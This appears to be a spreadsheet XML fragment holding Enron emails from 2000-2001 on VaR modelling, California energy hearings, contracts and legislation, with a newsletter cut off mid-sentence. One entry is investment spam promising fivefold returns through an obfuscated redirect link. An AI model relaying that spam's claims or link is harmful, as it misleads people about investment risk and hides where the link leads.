    <t>Re: "analytical" var implementation in RisktRAC</t>
  </si>
  <si>
    <t xml:space="preserve">Debbie,_x000D_
I am forwarding to you a 2 page document describing implementation of _x000D_
"analytical" VAR in RisktRAC._x000D_
_x000D_
Here is why this effort is very important:_x000D_
1. We need to calculate VAR for other percentile but 5 (1% or even 0.2% as _x000D_
mentioned by Rick Buy)_x000D_
and our simulation model can not handle required number of simulations;_x000D_
2. We need to present additional risk measures (such as Mean Tail Loss) to _x000D_
the Board._x000D_
_x000D_
The analytical approach is implemented in a spreadsheet and fully tested _x000D_
already so there will be no problems_x000D_
with the algorithm itself._x000D_
_x000D_
We need to get together and discuss IT implementation._x000D_
_x000D_
What do you think?_x000D_
_x000D_
Tanya_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 09:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>MeadMarketplace</t>
  </si>
  <si>
    <t xml:space="preserve"> - MeadMktplace (2).xls</t>
  </si>
  <si>
    <t>Sat, 27 Oct 2001 00:16:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lionb@sangmyung.ac.kr'})</t>
  </si>
  <si>
    <t>frozenset({'tengsbc@mailman.enron.com'})</t>
  </si>
  <si>
    <t>Accomplish Investment Objectives Quicker_x000D_
                         27523</t>
  </si>
  <si>
    <t>We all USE ENERGY....Everyone NEEDS IT!_x000D_
Did you know YOU can make BIG PROFITS from Energy?_x000D_
_x000D_
With winter coming on and trouble brewing in the Middle East too..._x000D_
Energy Prices Are Sure to RISE Soon!_x000D_
_x000D_
*Unleaded Gasoline_x000D_
*Electricity_x000D_
*Natural Gas_x000D_
*Heating Oil_x000D_
*Crude Oil_x000D_
_x000D_
We can show you how many of our clients have turned a small_x000D_
investment of $5,000 into $25,000 or MORE in a very short period_x000D_
of time!  Isn't everyone looking for YIELDS like that?_x000D_
_x000D_
HOW? Because WE ARE "The Energy Experts" and we are truly_x000D_
Energy Market Specialists. We KNOW the Energy Markets!_x000D_
_x000D_
We are an experienced, professional firm with over 25 years of_x000D_
experience. Learn how our clients get the best results, and_x000D_
receive the most professional care in the investment world today!_x000D_
_x000D_
Prices reach extremes for reasons..._x000D_
Do you want to know the reasons WHY?_x000D_
_x000D_
Get Your FREE Energy Investment Information Packet at_x000D_
http://996.682.889.0-aasrdh-gouri-nyry.htm@3267293794/cust/01/index.html?redirect=angelfire.lycois.com/ogoqstn/purvbrqfb/ufzd.htm?redirect=angelfire.lycos.com/ogoqstn/purvbrqfb/ufzd.htm_x000D_
_x000D_
(United States and Canada Only Please)_x000D_
_x000D_
_x000D_
(Opt-Out INSTRUCTIONS)_x000D_
This mailing is done by an independent marketing company._x000D_
Please do not reply to this e-mail, an e-mail reply cannot be read._x000D_
If you would like to be excluded from our mailing list, just click_x000D_
below and send us an opt-out request email._x000D_
_x000D_
mailto:sendbkrnd485@yahoo.com?subject=OptOut*Energy</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 08:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jackie.martin@enron.com'})</t>
  </si>
  <si>
    <t>Declined:</t>
  </si>
  <si>
    <t>Accepted meeting at 4:30, EB 3824.   _x000D_
_x000D_
Jackie Martin  for Gina Corteselli</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 02:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tom.briggs@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: US House panel sets April hearings on Calif crisis</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  May want to cover._x000D_
_x000D_
Jim_x000D_
_x000D_
----- Forwarded by James D Steffes/NA/Enron on 03/29/2001 10:33 AM -----_x000D_
_x000D_
	"Ronald Carroll" &lt;rcarroll@bracepatt.com&gt;_x000D_
	03/29/2001 08:58 AM_x000D_
		 _x000D_
		 To: &lt;mmilner@coral-energy.com&gt;, &lt;rreilley@coral-energy.com&gt;, _x000D_
&lt;ray.alvarez@ei.enron.com&gt;, &lt;acomnes@enron.com&gt;, &lt;dfulton@enron.com&gt;, _x000D_
&lt;jdasovic@enron.com&gt;, &lt;jhartso@enron.com&gt;, &lt;jsteffe@enron.com&gt;, _x000D_
&lt;smara@enron.com&gt;, &lt;snovose@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Fwd: US House panel sets April hearings on Calif crisis_x000D_
_x000D_
_x000D_
----- Message from "Tracey Bradley" &lt;tbradley@bracepatt.com&gt; on Wed, 28 Mar _x000D_
2001 17:14:17 -0600 -----_x000D_
To:	"Justin Long" &lt;jlong@bracepatt.com&gt;_x000D_
cc:	"Aryeh Fishman" &lt;afishman@bracepatt.com&gt;, "Andrea Settanni" _x000D_
&lt;asettanni@bracepatt.com&gt;, "Charles Ingebretson" _x000D_
&lt;cingebretson@bracepatt.com&gt;, "Charles Shoneman" &lt;cshoneman@bracepatt.com&gt;, _x000D_
"Deanna King" &lt;dking@bracepatt.com&gt;, "Jeffrey Watkiss" _x000D_
&lt;dwatkiss@bracepatt.com&gt;, "Gene Godley" &lt;ggodley@bracepatt.com&gt;, "Kimberly _x000D_
Curry" &lt;kcurry@bracepatt.com&gt;, "Michael Pate" &lt;mpate@bracepatt.com&gt;, "Paul _x000D_
Fox" &lt;pfox@bracepatt.com&gt;, "Ronald Carroll" &lt;rcarroll@bracepatt.com&gt;_x000D_
Subject:	US House panel sets April hearings on Calif crisis_x000D_
FYI_x000D_
_x000D_
US House panel sets April hearings on Calif crisis _x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
     WASHINGTON, March 28 (Reuters) - The U.S. House Government Reform _x000D_
Committee said Wednesday it would hold three field hearings in California _x000D_
next month on the economic fallout from the state's chronic electricity _x000D_
shortages. _x000D_
_x000D_
     The hearings will take place on April 10 in Sacramento, April 11 in San _x000D_
Jose, and April 12 in San Diego. _x000D_
_x000D_
     California, which has struggled to keep the lights on since last autumn, _x000D_
is widely expected to face blackouts during the peak power demand months of _x000D_
the summer. On Tuesday, state regulators approved an average 40 percent _x000D_
increase in consumer electricity rates to cover the soaring cost of energy _x000D_
and pump more cash into the state's near-bankrupt utilities. _x000D_
_x000D_
     "The energy crisis in California has ramifications for the entire _x000D_
country, and it looks like it's going to get worse before it gets better," _x000D_
Rep. Dan Burton, an Indiana Republican who heads the panel, said in a _x000D_
statement. _x000D_
_x000D_
     "The problems are costing California's economy billions of dollars, and _x000D_
that's going to affect the economy of the entire country," he added. _x000D_
_x000D_
     The committee will hear testimony from power generators, utilities, _x000D_
government entities, and local organizations. _x000D_
_x000D_
     Neighboring states have complained that California's thirst for power _x000D_
has boosted wholesale electricity prices throughout the western region, _x000D_
forcing some energy-intensive businesses like paper mills and mines to _x000D_
temporarily close. _x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
Copyright , 2001 Reuters Limited. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 01:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Todd Hall</t>
  </si>
  <si>
    <t>Sally, _x000D_
_x000D_
Thanks for calling last night._x000D_
_x000D_
I've spoken to Joe Gold (MD) and James New (my Power Director) and we will be _x000D_
delighted to have Todd over for a month._x000D_
_x000D_
We need him here for Monday 20th March - for 4 weeks - thru 15th April. Full _x000D_
Time. _x000D_
_x000D_
I guess he should plan to fly over next weekend to be here for the Monday - _x000D_
bright and early. The timing is crucial._x000D_
_x000D_
He would work jointly with Neil Tarling (Director) on the project - basically _x000D_
- to seperate the Continental Power Book into 4/5 regional books - complete _x000D_
with individual portfolio's, fully documented inter-book trades, currency _x000D_
functionality and control gates. He will be working with Traders, Comm Supp &amp; _x000D_
IT._x000D_
_x000D_
I suggest Todd touches base with James - Project 'Lead' - to get some _x000D_
backgroung information about the market._x000D_
_x000D_
I think the 'Sally will pay' line swung it with the Commercial folks......I _x000D_
said we had a free option - we can always send him home...._x000D_
_x000D_
Speak to you real soon._x000D_
_x000D_
B.</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 07:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dpalmer@kctera.net'})</t>
  </si>
  <si>
    <t>GISB Contract</t>
  </si>
  <si>
    <t xml:space="preserve">Per the request of Sylvia Pollan, attached please find Enron North America _x000D_
Corp.'s draft GISB agreement for Potlatch Corp.  Should you have any _x000D_
questions, feel free to contact me at (713) 853-5705._x000D_
_x000D_
Sincerely, _x000D_
_x000D_
Stacy Dickson_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 05:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Gerald:  Nothing wit or pertaining to North Coast Gas Transmission  LLC to _x000D_
the best of my knowledge._x000D_
Kay_x000D_
_x000D_
Kay C. Young_x000D_
Legal Specialist_x000D_
Enron North America Corp._x000D_
713-853-6794 Phone_x000D_
713-646-3393 Fax_x000D_
kay.young@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Gerald Nemec_x000D_
	02/13/2001 10:23 AM_x000D_
		 _x000D_
		 To: Kay Young/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: CA Data Sheet_x000D_
_x000D_
Kay,  PLease see the attached.  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 09:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lmacktal@cmta.net'})</t>
  </si>
  <si>
    <t>CMTA Legislative Weekly - 07/05/01</t>
  </si>
  <si>
    <t>Legislative Weekly=20_x000D_
July 5, 2001=20_x000D_
Issue 27, Volume 3=20_x000D_
_x000D_
A weekly publication from the=20_x000D_
California Manufacturers &amp; Technology Association=20_x000D_
detailing legislative and regulatory developments in Sacramento_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
A DEDICATED REVENUE STREAM=20_x000D_
Department of Water Resources Wants Money to Flow Their Way=20_x000D_
_x000D_
Six months ago Department of Water Resources took over power purchasing=20_x000D_
responsibility from the nearly insolvent investor-owned utilities. The=20_x000D_
general fund was first tapped, then a short-term loan allowed the purchasin=_x000D_
g=20_x000D_
to continue.? Now the state needs to issue $13.4 billion in bonds authorize=_x000D_
d=20_x000D_
in SBX1 31 (Burton D-San Francisco), to be paid back by utility ratepayers=_x000D_
=20_x000D_
for more than a decade.=20_x000D_
_x000D_
On July 12 the CPUC must decide how much of utility rates should be siphone=_x000D_
d=20_x000D_
off to pay off the bonds and the ongoing costs of power being purchased on=_x000D_
=20_x000D_
the spot market and under short and long term power contracts signed by DWR=_x000D_
.=20_x000D_
This =01&amp;dedicated revenue stream=018 (DRS) will be based on the latest ana=_x000D_
lysis by=20_x000D_
utility and administration financial experts. The big question is whether=_x000D_
=20_x000D_
current rates are high enough to cover all utility generation costs (nuclea=_x000D_
r,=20_x000D_
qualifying facilities, hydro, etc.), DWR power costs, and all the other=20_x000D_
elements of rates (public purpose charges, transmission and distribution,=_x000D_
=20_x000D_
etc.).? Many assumptions about the spot market, the effects of the FERC pri=_x000D_
ce=20_x000D_
mitigation order and the level of customer demand enter into the calculatio=_x000D_
n=20_x000D_
of the DRS.? Wholesale spot prices have recently dropped, but there still=_x000D_
=20_x000D_
could be a shortfall that would need to be made up in higher rates or with=_x000D_
=20_x000D_
more borrowing to push off repayment to the future.=20_x000D_
_x000D_
In related news, last week the CPUC nearly ordered the suspension of direct=_x000D_
=20_x000D_
access in order to ensure that customers would not be able to leave utility=_x000D_
=20_x000D_
service and thus escape the payment of bond and DWR power costs.? Customer=_x000D_
=20_x000D_
groups were able to persuade regulators to put off the decision pending=20_x000D_
legislation that could clarify a direct access customer's obligation to pay=_x000D_
 a=20_x000D_
fair share of these costs.? To that end, ABX2 10 (Hertzberg D-Van Nuys) is=_x000D_
=20_x000D_
being amended to make the bonds secured by the DRS rather than DWR contract=_x000D_
s,=20_x000D_
thus creating more regulatory flexibility regarding the terms of direct=20_x000D_
access, and SBX2 27 (Bowen D-Marina del Rey) and ABX2 42 (Kelley R-Idyllwil=_x000D_
d)=20_x000D_
are the competing vehicles for how exit fees should be calculated.=20_x000D_
?=20_x000D_
_x000D_
LOCKYER CONVENES NEW GRAND JURY ON ALLEGED PRICE GOUGING=20_x000D_
_x000D_
California Attorney General Bill Lockyer appointed 19 new members to a=20_x000D_
Sacramento County Grand Jury this week to consider the growing volume of=20_x000D_
evidence from both sides on the continuing investigations of alleged price=_x000D_
=20_x000D_
gouging by power generators. The Grand Jury to be convened later this week=_x000D_
=20_x000D_
will be issuing subpoenas for testimony and documents and is expected to be=_x000D_
=20_x000D_
impaneled for several months.=20_x000D_
_x000D_
In a related development, Lt. Governor Cruz Bustamante and Assemblywoman=20_x000D_
Barbara Matthews reportedly will introduce two new =01&amp;whistleblowers=018 a=_x000D_
t the=20_x000D_
state capitol on Thursday from a San Diego power plant. Recent testimony fr=_x000D_
om=20_x000D_
three employees before a legislative committee investigating charges of=20_x000D_
wrongdoing on the part of a San Diego power plant claimed their employer,=_x000D_
=20_x000D_
Duke Energy, manipulated the supply of electricity from the plant to increa=_x000D_
se=20_x000D_
the company's profits. In response, generators have produced documents=20_x000D_
showing they were simply following the direction from the State Independent=_x000D_
=20_x000D_
System Operator to modify their electricity output.=20_x000D_
?=20_x000D_
_x000D_
WINDFALL PROFITS TAX LEGISLATION TO BE CONSIDERED=20_x000D_
_x000D_
SBX2 1 (Soto D-Pomona) would impose a =01&a